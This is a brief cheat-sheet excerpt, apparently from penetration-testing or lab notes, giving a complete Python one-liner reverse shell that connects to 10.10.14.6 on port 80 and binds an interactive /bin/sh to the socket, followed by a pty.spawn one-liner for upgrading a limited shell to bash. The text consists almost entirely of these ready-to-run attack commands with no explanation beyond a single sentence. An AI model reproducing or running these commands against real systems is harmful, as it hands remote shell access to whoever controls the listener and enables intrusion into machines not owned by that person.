............................................................
Python reverse shell
Python is also a very commonly installed language on Linux machines. The following command issues a reverse shell using Python:

/usr/bin/python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.6",80)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

.........................................................

SKIP LIMITED SHELL

python -c 'import pty;pty.spawn("/bin/bash")'

.........................................................
